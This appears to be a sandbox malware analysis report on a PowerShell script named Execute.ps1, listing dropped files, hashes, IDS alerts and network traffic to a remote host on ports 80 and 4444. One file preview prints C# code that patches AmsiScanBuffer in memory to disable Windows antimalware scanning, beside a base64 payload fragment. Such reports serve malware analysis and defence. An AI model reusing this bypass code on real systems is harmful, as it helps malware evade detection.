                          Preview:PSMODULECACHE......&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-Z..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package........Find-Package........Install-PackageProvider........Import-PackageProvider........Get-PackageProvider........Register-PackageSource........Uninstall-Package........Find-PackageProvider........p...z..[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                          Category:dropped
                          Size (bytes):1703
                          Entropy (8bit):4.758062771969888
                          Encrypted:false
                          SSDEEP:48:Jjh+l+o8ZIFhRDdi8zGehwsFwzvxIdX1pIpU1tdIOPC2b:Jjpo8ch17gZI1IutdIOpb
                          MD5:DAF9787822A1CD4A3102E005B0B5539C
                          SHA1:BFA3F7CD00F5348D5BAC305B4AD18B4FEE65A6BC
                          SHA-256:CF908E8C3464BB2889C7B16C2C2A03E4B3280638CF576DF7A081C5C65CF52D83
                          SHA-512:DB85BFACD06BDB00D9BDF95AAC18BEA0262344B5156B47EC409D482113C11BAABD4F8A1E183C00A2CB63D40948CC6AB5375B1A31A97C238B42F7B88A0C47FEC0
                          Malicious:true
                          Reputation:low
                          Preview:.using System;.using System.Runtime.InteropServices;..namespace BP.{. public class AMS. {. [DllImport("kernel32")]. public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);. [DllImport("kernel32")]. public static extern IntPtr LoadLibrary(string name);. [DllImport("kernel32")]. public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);.. [DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]. static extern void MoveMemory(IntPtr dest, IntPtr src, int size);... public static void Disable(). {. IntPtr AMSDLL = LoadLibrary("amsi.dll");. IntPtr AMSBPtr = GetProcAddress(AMSDLL, "Am" + "si" + "Scan" + "Buffer");. UIntPtr dwSize = (UIntPtr)5;. uint Zero = 0;. VirtualProtect(AMSBPtr, dwSize, 0x40, out Zero);. Byte[] Patch1 = { 0x31 };. B
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                          Category:dropped
                          Size (bytes):371
                          Entropy (8bit):5.2650024927205195
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CHhJ23f9xo+Uzxs7+AEszICHhJ23f9xo8:p37Lvkmb6Ki1xo+UWZEv1xo8
                          MD5:174A2E39BA4603BD6C5D6C69EA4402D8
                          SHA1:2F1744CD46DAB235DD050789EB07DF2BDD436110
                          SHA-256:95C0EB2A095CA4304D9105A44CA87B688D1DB8FC439AB3AD13779C45E89EAD3C
                          SHA-512:9E927A41D5F16BB279CF45CA335A861E2C195D550F55797E81A5EAAB0931BEE77D2FC5B0B52B07E31B8460FBBFEF677133F504E08B782B7DFAD8A8F9C8679527
                          Malicious:true
                          Reputation:low
                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.0.cs"
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):4096
                          Entropy (8bit):3.3285327778117244
                          Encrypted:false
                          SSDEEP:48:6wwtzBidBcLC5eHhrJU0pkhKMDDzs1ulMa3Aq:itzcBiC5eJytPDaK
                          MD5:7AF68E3F729127AD73AA656F2108F93B
                          SHA1:C091BFA452F9F4DDD4D2ABDB903E2F12525BA41A
                          SHA-256:8E2AA5AD84B0BCC1EFCC06C14549C9F9B895C621F7F793E60881B5B73B9A1110
                          SHA-512:F5A091105D8CD2B1C45224ACF9D7D3D3B2B529C95F128F57F10EBF91BA5963E1AFF514828263F35DF6DA69F69D69C774CF4CA4CEB1ED6F030FF6684DE72430D5
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...".g...........!.................&... ...@....... ....................................@.................................|&..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......@!..<............................................................0..........r...p(......r...p(......(..........@..(....&............1................ .................... ..........(............(.......(.......(.....(............(.......(.......(.....(............(.......(.......(....r1..p(....*..(....*BSJB............v4.0.30319......l.......#~..@.......#Strings....,...l...#US.........#GUID...........#Blob...........G.........%3........................................
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                          Category:modified
                          Size (bytes):872
                          Entropy (8bit):5.327490263744411
                          Encrypted:false
                          SSDEEP:24:KOId3ka6Ki1+GEv1+pKax5DqBVKVrdFAMBJTH:xkka6L0GEv0pK2DcVKdBJj
                          MD5:4C92DCC0081DC3415D51627F3A47622E
                          SHA1:C84D4C08250C7F7FA138FA80B672EF6C29E96D24
                          SHA-256:974365FC11E8A0E41F78D5CE06781EE9329A46FD92ACC168C0A43F519BEC7964
                          SHA-512:9C1AC9CD762DF8EB7B9C7A93114C273AF620677E6CD3913641EDD83AE3E84E61C19FC915D5D0C8433D6835C4C634695252360384A1E9F3A27852DE21F550A986
                          Malicious:false
                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:MSVC .res
                          Category:dropped
                          Size (bytes):652
                          Entropy (8bit):3.1056410157656775
                          Encrypted:false
                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKak7Ynqq4PN5Dlq5J:+RI+ycuZhNMakS4PNnqX
                          MD5:A2C7EEBFB1C3003E254EAEAD2BF06422
                          SHA1:90BEA2767E0681E7273AD36A126DAECDB0D0448B
                          SHA-256:4CB783AEC810CC66543B0E787731B747BC944BF8F7A856D667D2820B986CBC92
                          SHA-512:3E1E00EC4AB2EC848E62668F9C4ABF6E6CB7CFFB46322A5F80B15279ADDCE7CD404C3A39218AF53E835FEB9ED24D618132D422467AA4E5074BC0A57359DB3FCC
                          Malicious:false
                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.u.t.2.q.r.c.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.u.t.2.q.r.c.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Wed Jan 15 16:06:58 2025, 1st section name ".debug$S"
                          Category:dropped
                          Size (bytes):1332
                          Entropy (8bit):3.999721309651937
                          Encrypted:false
                          SSDEEP:24:H/FzW9nq1kTbHdawKRmNII+ycuZhNMakS4PNnqS2d:Mq2b9xKRmu1ulMa3AqSG
                          MD5:9F3DBE71D5C85244B38DC8026EA113D7
                          SHA1:6B5DEA6F9410E33750DDBEA2A45EFCB4705710DF
                          SHA-256:1967AD5CC093560480BD3377B455FACDB49275265F127F883B66197D575F8564
                          SHA-512:371B506B282DC7FE7EE43C5E4C73DA1000051E49955A56882EBF34E5E0328D10E9AFF92EA9C091BD9E6BC57BD96FC856EDF2215DC5C0E91BC6435D339ECF783E
                          Malicious:false
                          Preview:L...".g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........S....c:\Users\user\AppData\Local\Temp\1ut2qrcn\CSCB06954D52E141279519B5296B9E4C4.TMP.....................>%N..+.d"..........5.......C:\Users\user\AppData\Local\Temp\RES80CF.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.u.t.2.q.r.c.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6222
                          Entropy (8bit):3.7119744406132824
                          Encrypted:false
                          SSDEEP:48:AVxJQFh+CrWU23n2ukvhkvklCywetlH4wl15SogZoM3FH4wlx5SogZoMb1:kssCrP8fkvhkvCCteHH4wYHdVH4w8Hdh
                          MD5:52B6D06011BBABDBCD301CAE2A7F4D32
                          SHA1:5D247902F6473593782AE1530D27B56EDC7F79CF
                          SHA-256:64198EE27D23CBD6B4E65D90394FE496BD2868A841588BEF2BCEED63CDF5BF3B
                          SHA-512:19D6ABB2676C64E009FD1AD0DA9FAE9C04A4FE4A823C4FED3347728009399875987D211C3CE5B8F099C881EEA7A8621D486621B4E030042FC4C40306E44EECFF
                          Malicious:false
                          Preview:...................................FL..................F.".. ......Yd.....!w^g..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....m.r^g...t2w^g......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B/ZGx..........................d...A.p.p.D.a.t.a...B.V.1...../ZEx..Roaming.@......EW)B/ZEx...........................N..R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B/ZBx............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B/ZBx...........................t..W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B/ZBx....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B/ZBx....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B/ZIx.....0..........
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6222
                          Entropy (8bit):3.7119744406132824
                          Encrypted:false
                          SSDEEP:48:AVxJQFh+CrWU23n2ukvhkvklCywetlH4wl15SogZoM3FH4wlx5SogZoMb1:kssCrP8fkvhkvCCteHH4wYHdVH4w8Hdh
                          MD5:52B6D06011BBABDBCD301CAE2A7F4D32
                          SHA1:5D247902F6473593782AE1530D27B56EDC7F79CF
                          SHA-256:64198EE27D23CBD6B4E65D90394FE496BD2868A841588BEF2BCEED63CDF5BF3B
                          SHA-512:19D6ABB2676C64E009FD1AD0DA9FAE9C04A4FE4A823C4FED3347728009399875987D211C3CE5B8F099C881EEA7A8621D486621B4E030042FC4C40306E44EECFF
                          Malicious:false
                          Preview:...................................FL..................F.".. ......Yd.....!w^g..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....m.r^g...t2w^g......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B/ZGx..........................d...A.p.p.D.a.t.a...B.V.1...../ZEx..Roaming.@......EW)B/ZEx...........................N..R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B/ZBx............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B/ZBx...........................t..W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B/ZBx....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B/ZBx....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B/ZIx.....0..........
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):29
                          Entropy (8bit):4.159199529386524
                          Encrypted:false
                          SSDEEP:3:dIMl9BAGN1:v9BAGN1
                          MD5:8F40897B144A968293946E7F04FA99F8
                          SHA1:5B292965B449BA85B6C26793B37A53FD78310839
                          SHA-256:3F842AFD69DC775618EA79F5D88A67E3C4B1A933EC299EAE6627757707081D33
                          SHA-512:D4A1EF84B955E3B733DCA3C58D25745DB606ACFA5CB51FEDC4B09E12C67036B0FF3903BC913BF8176FDB189F2108E4D81A1F945CECF19F2EC766B592FAA4DCD7
                          Malicious:false
                          Preview:Memory patched successfuly...
                          File type:Unicode text, UTF-8 (with BOM) text, with very long lines (2277), with CRLF line terminators
                          Entropy (8bit):5.812839541758453
                          TrID:
                          • Text - UTF-8 encoded (3003/1) 100.00%
                          File name:Execute.ps1
                          File size:2'834 bytes
                          MD5:4dcc2df2d674dab72c13fd4cd34097f8
                          SHA1:db114339bd7b17a6fc1041b565046d506b457725
                          SHA256:37eb80a2bc8664f6f670015add9d235ba4d6f34450c6f48475e1679424b05a78
                          SHA512:c6870d2828dc986e22e59e128bf7f57407dff9380536bd5bc24a287adc6610c33a068cb32ccc45c7db5261283d789ec88c813ae49edee82ae278cfac5da581fe
                          SSDEEP:48:mT6qR4jHR4/fZVQ5/134Jb0GvY/5clFvxTyAC0st4v6cO+WaKhOKD:36/fZvJIGa58xTyAC0sHwF4D
                          TLSH:6C51B857BE164CD88352594315ECFBC66B2D9BECF2A10C2958DD9FC8887A67821D011D
                          File Content Preview:...Write-Output "MAGIC"..$b64 = 'dXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpuYW1lc3BhY2UgQlAKewogICAgcHVibGljIGNsYXNzIEFNUwogICAgewogICAgICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyIildCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldF
                          Icon Hash:3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-15T16:02:20.623250+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.8 | 49704 | 158.101.196.44 | 80 | TCP
2025-01-15T16:02:20.944034+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49704 | 158.101.196.44 | 80 | TCP
2025-01-15T16:02:20.944056+0100 | 1810003 | Joe Security ANOMALY Windows PowerShell HTTP PE File Download | 2 | 158.101.196.44 | 80 | 192.168.2.8 | 49704 | TCP
2025-01-15T16:02:23.237129+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49705 | 158.101.196.44 | 4444 | TCP
2025-01-15T16:02:31.551525+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49708 | 158.101.196.44 | 4444 | TCP
2025-01-15T16:02:39.785833+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49715 | 158.101.196.44 | 4444 | TCP
2025-01-15T16:02:48.103350+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49718 | 158.101.196.44 | 4444 | TCP
2025-01-15T16:02:56.397561+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49721 | 158.101.196.44 | 4444 | TCP
2025-01-15T16:03:04.668695+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49724 | 158.101.196.44 | 4444 | TCP
2025-01-15T16:03:12.958618+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49727 | 158.101.196.44 | 4444 | TCP
2025-01-15T16:03:21.394361+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49731 | 158.101.196.44 | 4444 | TCP
2025-01-15T16:03:29.647376+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49734 | 158.101.196.44 | 4444 | TCP
2025-01-15T16:03:37.912504+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49773 | 158.101.196.44 | 4444 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 15, 2025 16:02:19.989149094 CET | 49704 | 80 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:19.994337082 CET | 80 | 49704 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:19.994415045 CET | 49704 | 80 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:19.997122049 CET | 49704 | 80 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:20.002470016 CET | 80 | 49704 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:20.623145103 CET | 80 | 49704 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:20.623198032 CET | 80 | 49704 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:20.623234987 CET | 80 | 49704 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:20.623250008 CET | 49704 | 80 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:20.623270988 CET | 80 | 49704 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:20.623327971 CET | 49704 | 80 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:20.769521952 CET | 49704 | 80 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:20.774583101 CET | 80 | 49704 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:20.943922043 CET | 80 | 49704 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:20.943979025 CET | 80 | 49704 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:20.944016933 CET | 80 | 49704 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:20.944034100 CET | 49704 | 80 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:20.944056034 CET | 80 | 49704 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:20.944092035 CET | 80 | 49704 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:20.944117069 CET | 49704 | 80 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:20.944128036 CET | 80 | 49704 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:20.944174051 CET | 49704 | 80 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:21.580013990 CET | 49705 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:21.586587906 CET | 4444 | 49705 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:21.586668968 CET | 49705 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:21.591650009 CET | 49705 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:21.599056959 CET | 4444 | 49705 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:23.236907005 CET | 4444 | 49705 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:23.237128973 CET | 49705 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:23.237232924 CET | 49705 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:23.237865925 CET | 49706 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:23.242036104 CET | 4444 | 49705 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:23.242821932 CET | 4444 | 49706 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:23.242908001 CET | 49706 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:23.243196964 CET | 49706 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:23.248008966 CET | 4444 | 49706 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:24.912353992 CET | 4444 | 49706 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:24.912552118 CET | 49706 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:24.912620068 CET | 49706 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:24.913197994 CET | 49707 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:24.918778896 CET | 4444 | 49706 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:24.919491053 CET | 4444 | 49707 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:24.919553995 CET | 49707 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:24.919585943 CET | 49707 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:24.926151991 CET | 4444 | 49707 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:24.926229000 CET | 49707 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:25.954224110 CET | 80 | 49704 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:25.954303026 CET | 49704 | 80 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:29.944766045 CET | 49708 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:29.949872971 CET | 4444 | 49708 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:29.949959993 CET | 49708 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:29.950416088 CET | 49708 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:29.955228090 CET | 4444 | 49708 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:31.551443100 CET | 4444 | 49708 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:31.551525116 CET | 49708 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:31.551587105 CET | 49708 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:31.552150965 CET | 49709 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:31.556401968 CET | 4444 | 49708 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:31.556986094 CET | 4444 | 49709 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:31.557055950 CET | 49709 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:31.557244062 CET | 49709 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:31.562021971 CET | 4444 | 49709 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:33.144879103 CET | 4444 | 49709 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:33.145010948 CET | 49709 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:33.145083904 CET | 49709 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:33.145559072 CET | 49710 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:33.149983883 CET | 4444 | 49709 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:33.150348902 CET | 4444 | 49710 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:33.150413990 CET | 49710 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:33.150453091 CET | 49710 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:33.155481100 CET | 4444 | 49710 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:33.155539036 CET | 49710 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:38.164067030 CET | 49715 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:38.169922113 CET | 4444 | 49715 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:38.170025110 CET | 49715 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:38.170250893 CET | 49715 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:38.175126076 CET | 4444 | 49715 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:39.785651922 CET | 4444 | 49715 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:39.785832882 CET | 49715 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:39.785832882 CET | 49715 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:39.786206007 CET | 49716 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:39.790723085 CET | 4444 | 49715 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:39.791003942 CET | 4444 | 49716 | 158.101.196.44 | 192.168.2.8
Jan 15, 2025 16:02:39.791073084 CET | 49716 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:39.791420937 CET | 49716 | 4444 | 192.168.2.8 | 158.101.196.44
Jan 15, 2025 16:02:39.796200037 CET | 4444 | 49716 | 158.101.196.44 | 192.168.2.8
